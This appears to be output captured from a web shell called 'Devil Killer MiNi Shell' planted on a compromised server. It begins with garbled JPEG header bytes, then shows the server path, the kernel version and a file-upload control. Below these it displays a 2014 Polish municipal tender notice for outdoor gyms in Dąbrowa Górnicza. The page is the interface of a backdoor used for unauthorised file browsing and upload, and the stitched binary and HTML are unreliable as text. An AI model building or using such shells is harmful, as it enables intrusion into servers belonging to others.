JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140609/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140609/194484-N-2014.html

<p class="kh_header"><b>Dąbrowa Górnicza: A.	Siłownia pod chmurką dzielnica Mydlice Południowe -Przestrzeń wspólna -strefy integracji społecznej w Dąbrowie Górniczej, 
B.	Siłownia zewnętrzna -Przestrzeń wspólna -strefy integracji  społecznej 
w Dąbrowie Górniczej, 
C.	Skwer rekreacji ruchowej,
D.	Siłownia zewnętrzna, monitoring oraz montaż ogrodzenia</b><br>
<b>Numer ogłoszenia: 194484 - 2014; data zamieszczenia: 09.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> A.	Siłownia pod chmurką dzielnica Mydlice Południowe -Przestrzeń wspólna -strefy integracji społecznej w Dąbrowie Górniczej, 
B.	Siłownia zewnętrzna -Przestrzeń wspólna -strefy integracji  społecznej 
w Dąbrowie Górniczej, 
C.	Skwer rekreacji ruchowej,
D.	Siłownia zewnętrzna, monitoring oraz montaż ogrodzenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Postępowanie o udzielenie zamówienia prowadzone  w trybie przetargu nieograniczonego  na podstawie ustawy   z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2013r.,poz. 907 z  pózn. zm), zwanej dalej Ustawą, o wartości zamówienia poniżej 5.186.000,00 EUR.
II. Przedmiot i zakres zamówienia: 
1. A. Siłownia pod chmurką dzielnica Mydlice Południowe -Przestrzeń wspólna -strefy integracji społecznej w Dąbrowie Górniczej .
1.1.Przedmiotem zamówienia jest budowa siłowni zewnętrznej polegająca na zabudowaniu dostarczonych   przez wykonawcę metalowych podwójnych urządzeń sportowych przeznaczonych do ćwiczeń na wolnym powietrzu, ich transport oraz montaż na terenie miasta Dąbrowa Górnicza w miejscach wskazanych przez Zamawiającego, zgodnie z załącznikiem nr 1 A  SIWZ.  
1.2.	Pod zamontowanymi urządzeniami należy wykonać nawierzchnię z kostki brukowej betonowej szarej                o grubości 6 cm na podsypce cementowo-piaskowej zgodnie z przedmiarem robót (zał. nr 9 do SIWZ).   
1.3.	Wszystkie elementy muszą spełniać wymogi bezpieczeństwa i ergonomii oraz wymagania określone w przepisach BHP oraz pozostałych przepisach prawa. 
1.4.	Urządzenia winny być wykonane ze stali nierdzewnej, malowane proszkowo na kolor srebrno - żółty. Elementy narażone na zużycie typu stopki, siedziska winny być wykonane ze stali nierdzewnej odpornej na warunki atmosferyczne oraz zadrapania. 
1.5.	Wszystkie urządzenia winny posiadać ograniczniki, które uniemożliwiają nadmierne wychylenie elementów wahających się powyżej 50 stopni, co ma na celu zapobiegać niebezpiecznym uderzeniom. Elementy swobodnie opadające w prasach w celu zredukowania siły zderzenia elementów winny mieć zastosowane amortyzatory.
1.6.	Każde urządzenie winno być urządzeniem modułowym tj. pozwalającym na zastosowanie dowolnej konfiguracji dwóch stanowisk do ćwiczeń po obu stronach pylona. 
1.7.	Każde urządzenie winno być wyposażone w tablice znamionową zamontowaną w centralnej części pylonu, 
z funkcjami i instrukcją do ćwiczeń.
1.8.	Wykonawca jest odpowiedzialny za prowadzenie prac zgodnie z wszelkimi niezbędnymi przepisami, obowiązującymi normami oraz zasadami współczesnej wiedzy technicznej zapewniając bezpieczne 
i higieniczne warunki pracy. Jednocześnie winien przestrzegać warunków umowy oraz odpowiada za jakość zastosowanych materiałów i wykonywanych prac i za ich zgodność z dokumentacją.
1.9.	Wykonawca winien udzielić 36 miesięcy gwarancji jakości na  zrealizowany przedmiot zamówienia liczony od daty podpisania przez obie strony protokołu odbioru końcowego. 
1.10.	Po zakończeniu prac Wykonawca winien uporządkować teren i zutylizować wszelkie wytworzone odpady.
2. B. Siłownia zewnętrzna -Przestrzeń wspólna -strefy integracji społecznej w Dąbrowie Górniczej.
2.1.	Przedmiotem zamówienia jest budowa siłowni zewnętrznej polegająca na zabudowaniu dostarczonych   przez wykonawcę metalowych podwójnych urządzeń sportowych przeznaczonych do ćwiczeń na wolnym powietrzu, ich transport oraz montaż na terenie miasta Dąbrowa Górnicza w miejscach wskazanych przez Zamawiającego, zgodnie z załącznikiem nr 1 B  SIWZ.
2.2.	Pod zamontowanymi urządzeniami należy wykonać nawierzchnię z kostki brukowej betonowej szarej o grubości 6 cm na podsypce cementowo-piaskowej zgodnie z przedmiarem robót (zał. nr 9 do SIWZ).  
2.3.	Wszystkie elementy muszą spełniać wymogi bezpieczeństwa i ergonomii oraz wymagania określone w przepisach BHP oraz pozostałych przepisach prawa. 
2.4.	Urządzenia winny być wykonane ze stali nierdzewnej, malowane proszkowo na kolor srebrno - żółty. Elementy narażone na zużycie typu stopki, siedziska winny być wykonane ze stali nierdzewnej odpornej na warunki atmosferyczne oraz zadrapania. 
2.5.	Wszystkie urządzenia winny posiadać ograniczniki, które uniemożliwiają nadmierne wychylenie elementów wahających się powyżej 50 stopni, co ma na celu zapobiegać niebezpiecznym uderzeniom. Elementy swobodnie opadające w prasach w celu zredukowania siły zderzenia elementów winny mieć zastosowane amortyzatory.
2.6.	Każde urządzenie winno być urządzeniem modułowym tj. pozwalającym na zastosowanie dowolnej konfiguracji dwóch stanowisk do ćwiczeń po obu stronach pylona. 
2.7.	Każde urządzenie winno być wyposażone w tablice znamionową zamontowaną w centralnej części pylonu, z funkcjami i instrukcją do ćwiczeń.
2.8.	Wykonawca jest odpowiedzialny za prowadzenie prac zgodnie z wszelkimi niezbędnymi przepisami, obowiązującymi normami oraz zasadami współczesnej wiedzy technicznej zapewniając bezpieczne 
i higieniczne warunki pracy. Jednocześnie winien przestrzegać warunków umowy oraz odpowiada za jakość zastosowanych materiałów i wykonywanych prac i za ich zgodność z dokumentacją.
2.9.	Wykonawca winien udzielić 36 miesięcy gwarancji jakości na  zrealizowany przedmiot zamówienia liczony od daty podpisania przez obie strony protokołu odbioru końcowego. 
2.10.	Po zakończeniu prac Wykonawca winien uporządkować teren i zutylizować wszelkie wytworzone odpady.
3. C. Skwer rekreacji ruchowej. 
3.1.	Przedmiotem zamówienia jest budowa siłowni zewnętrznej  polegająca na zabudowaniu dostarczonych   przez wykonawcę metalowych  podwójnych urządzeń sportowych przeznaczonych do ćwiczeń na wolnym powietrzu, ich transport oraz montaż na terenie miasta Dąbrowa Górnicza w miejscach wskazanych przez Zamawiającego zgodnie z załącznikiem nr 1 C SIWZ.
3.2.	Pod zamontowanymi urządzeniami należy wykonać nawierzchnię z kostki brukowej betonowej szarej o grubości 6 cm na podsypce cementowo-piaskowej zgodnie z przedmiarem robót (zał. nr 9 do SIWZ).  
3.3.	Wszystkie elementy muszą spełniać wymogi bezpieczeństwa i ergonomii oraz wymagania określone w przepisach BHP oraz pozostałych przepisach prawa. 
3.4.	Urządzenia winny być wykonane ze stali nierdzewnej, malowane proszkowo na kolor srebrno - żółty. Elementy narażone na zużycie typu stopki, siedziska winny być wykonane ze stali nierdzewnej odpornej na warunki atmosferyczne oraz zadrapania. 
3.5.	Wszystkie urządzenia winny posiadać ograniczniki, które uniemożliwiają nadmierne wychylenie elementów wahających się powyżej 50 stopni, co ma na celu zapobiegać niebezpiecznym uderzeniom. Elementy swobodnie opadające w prasach w celu zredukowania siły zderzenia elementów winny mieć zastosowane amortyzatory.
3.6.	Każde urządzenie winno być urządzeniem modułowym tj. pozwalającym na zastosowanie dowolnej konfiguracji dwóch stanowisk do ćwiczeń po obu stronach pylona. 
3.7.	Każde urządzenie winno być wyposażone w tablice znamionową zamontowaną w centralnej części pylonu, z funkcjami i instrukcją do ćwiczeń.
3.8.	Wykonawca jest odpowiedzialny za prowadzenie prac zgodnie z wszelkimi niezbędnymi przepisami, obowiązującymi normami oraz zasadami współczesnej wiedzy technicznej zapewniając bezpieczne 
i higieniczne warunki pracy. Jednocześnie winien przestrzegać warunków umowy oraz odpowiada za jakość zastosowanych materiałów i wykonywanych prac i za ich zgodność z dokumentacją.
3.9.	Wykonawca winien udzielić 36 miesięcy gwarancji jakości na  zrealizowany przedmiot zamówienia liczony od daty podpisania przez obie strony protokołu odbioru końcowego. 
3.10.	Po zakończeniu prac Wykonawca winien uporządkować teren i zutylizować wszelkie wytworzone odpady.
4. D  Siłownia  zewnętrzna monitoring i montaż ogrodzenia. 
4.1.	Przedmiotem zamówienia jest budowa siłowni zewnętrznej  polegająca na zabudowaniu dostarczonych   przez wykonawcę metalowych  podwójnych urządzeń sportowych przeznaczonych do ćwiczeń na wolnym powietrzu, ich transport oraz montaż na terenie miasta Dąbrowa Górnicza w miejscach wskazanych przez Zamawiającego zgodnie  z zał. nr 1 D SIWZ oraz zabudowa systemowego ogrodzenia betonowego zgodnie z przedmiarem robót (zał. nr 9 do SIWZ).  Zamawiający informuje, że dostawa i montaż monitoringu nie jest przedmiotem postępowania.
4.2.	Wszystkie elementy muszą spełniać wymogi bezpieczeństwa i ergonomii oraz wymagania określone   w przepisach BHP oraz pozostałych przepisach prawa. 
4.3.	Urządzenia winny być wykonane ze stali nierdzewnej, malowane proszkowo na kolor srebrno - żółty. Elementy narażone na zużycie typu stopki, siedziska winny być wykonane ze stali nierdzewnej odpornej na warunki atmosferyczne oraz zadrapania. 
4.4.	Wszystkie urządzenia winny posiadać ograniczniki, które uniemożliwiają nadmierne wychylenie elementów wahających się powyżej 50 stopni, co ma na celu zapobiegać niebezpiecznym uderzeniom. Elementy swobodnie opadające w prasach w celu zredukowania siły zderzenia elementów winny mieć zastosowane amortyzatory.
4.5.	Każde urządzenie winno być urządzeniem modułowym tj. pozwalającym na zastosowanie dowolnej konfiguracji dwóch stanowisk do ćwiczeń po obu stronach pylona. 
4.6.	Każde urządzenie winno być wyposażone w tablice znamionową zamontowaną w centralnej części pylonu, z funkcjami i instrukcją do ćwiczeń.
4.7.	Wykonawca jest odpowiedzialny za prowadzenie prac zgodnie z wszelkimi niezbędnymi przepisami, obowiązującymi normami oraz zasadami współczesnej wiedzy technicznej zapewniając bezpieczne 
i higieniczne warunki pracy. Jednocześnie winien przestrzegać warunków umowy oraz odpowiada za jakość zastosowanych materiałów i wykonywanych prac i za ich zgodność z dokumentacją.
4.8.	Wykonawca winien udzielić 36 miesięcy gwarancji jakości na  zrealizowany przedmiot zamówienia liczony od daty podpisania przez obie strony protokołu odbioru końcowego. 
4.9.	Po zakończeniu prac Wykonawca winien uporządkować teren i zutylizować wszelkie wytworzone odpady
III.  Wszystkie dostarczone i zamontowane urządzenia do siłowni zewnętrznych winny posiadać stosowane certyfikaty zgodności z normami PN-EN 1176 oraz PN-EN 957 lub równoważne (dot. zadania  A i  zadania B i   zadania  C i   zadania  D)
IV.  Rozwiązania równoważne
Wskazane w SIWZ znaki towarowe, normy, patenty i miejsce pochodzenia są uzasadnione specyfiką przedmiotu zamówienia i mają na celu wskazanie jedynie jakości i parametrów przedmiotu zamówienia z uwagi na brak innych dostatecznie dokładnych określeń, które pozwalałyby opisać przedmiot zamówienia w tej części w sposób jednoznaczny i wyczerpujący. W związku z powyższym Wykonawcy mogą składać oferty równoważne w stosunku do przedmiotu zamówienia przedstawionego w SIWZ - zgodnie z art. 30 ust. 4 i 5 Ustawy.     
W związku z tym :
1.	Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych - tj. o parametrach technicznych i jakościowych nie gorszych niż określone w SIWZ - w odniesieniu do materiałów i urządzeń, których pochodzenie zostało określone przez Zamawiającego w SIWZ nazwą producenta.
2.	Zgodnie z art. 30 ust. 5 Ustawy Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego. Równoważność pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych ma w szczególności gwarantować realizację zadania w zgodzie z dokumentacją techniczną oraz zapewnić uzyskanie parametrów technicznych nie gorszych od założonych w SIWZ.
Uwaga: 
W załączniku nr 7 do SIWZ przedstawiono przykładową wizualizacje wraz z opisem funkcji urządzeń sportowych wymaganych przez Zamawiającego.
V. Roboty należy zrealizować na podstawie :  
1.	przedmiarów robót  
2.	Specyfikacji Technicznej Wykonania i Odbioru Robót 
3.	wymogów Specyfikacji Istotnych Warunków Zamówienia wraz z projektem umowy 
4.	zasad wiedzy technicznej, sztuki budowlanej i przepisów prawa.
VI. Zamówienie musi być realizowane zgodnie z:
1.	Ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. z 2010r., Nr 243 poz. 1623 z późn. zm.);
2.   Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz. U. z 2003r., Nr 169, poz. 1650 z późn. zm.).
VII. Gwarancja jakości 
1.	 Wykonawca winien udzielić 36 miesięcy gwarancji jakości na  zrealizowany przedmiot zamówienia liczony od daty podpisania przez obie strony protokołu odbioru końcowego.
2. 	W okresie gwarancji Wykonawca zobowiązuję się usunąć wynikłe usterki i awarie nieodpłatnie w terminie wskazanym przez Zamawiającego w pisemnym zgłoszeniu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 37.41.00.00-5, 45.34.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dot. zadania A i zadania B i zadania C i zadania D -Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. zadania A i zadania B i zadania C i zadania D.
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończył min. 1 robotę obejmującą swym zakresem montaż urządzeń siłowni zewnętrznej wraz z dostawą urządzeń na kwotę minimum 40, 000,00 brutto zł .

Jeżeli Wykonawca składa ofertę na dwa lub więcej zadań za spełnienie warunku jw. uznana zostanie realizacja  jednego zadania jw.  

Uwagi: 
1. Jeżeli zakres robót przedstawionych w dokumencie złożonym na  potwierdzenie, że roboty budowlane zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej  i prawidłowo  ukończone jest szerszy od powyżej określonego przez Zamawiającego należy w wykazie robót budowlanych podać wartość robót odpowiadających zakresowi przedmiotu zamówienia.
2. Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego  w dniu, w którym  ogłoszenie o niniejszym postępowaniu zostało zamieszczone  w Biuletynie Zamówień Publicznych.
3. W przypadku, gdy Wykonawca polega na zasobach innych podmiotów przy wykazaniu spełniania warunku doświadczenia, zobowiązany jest wykazać udział tych podmiotów w wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dot. zadania  A i zadania B i zadania C i zadania  D-
Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dot. zadania A i zadania B i zadania C i zadania D -Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje  minimum 1 osobą posiadająca uprawnienia do kierowania robotami w specjalności konstrukcyjno-budowlanej zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. z 2006r., Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej obowiązujących przepisów.  

Jeżeli Wykonawca składa ofertę na dwa lub więcej zadań za spełnienie warunku jw. uznane zostanie dysponowanie jedną osobą posiadającą wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dot. zadania  A i zadania B i zadania C i zadania  D-
Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów dotyczy robót budowlanych pozwalających wykazać, iż Wykonawca spełnia warunek określony w pkt. 8.1.2. SIWZ.   W wykazie nie należy podawać informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia zdolności Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5 Ustawy (zdanie 2).;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

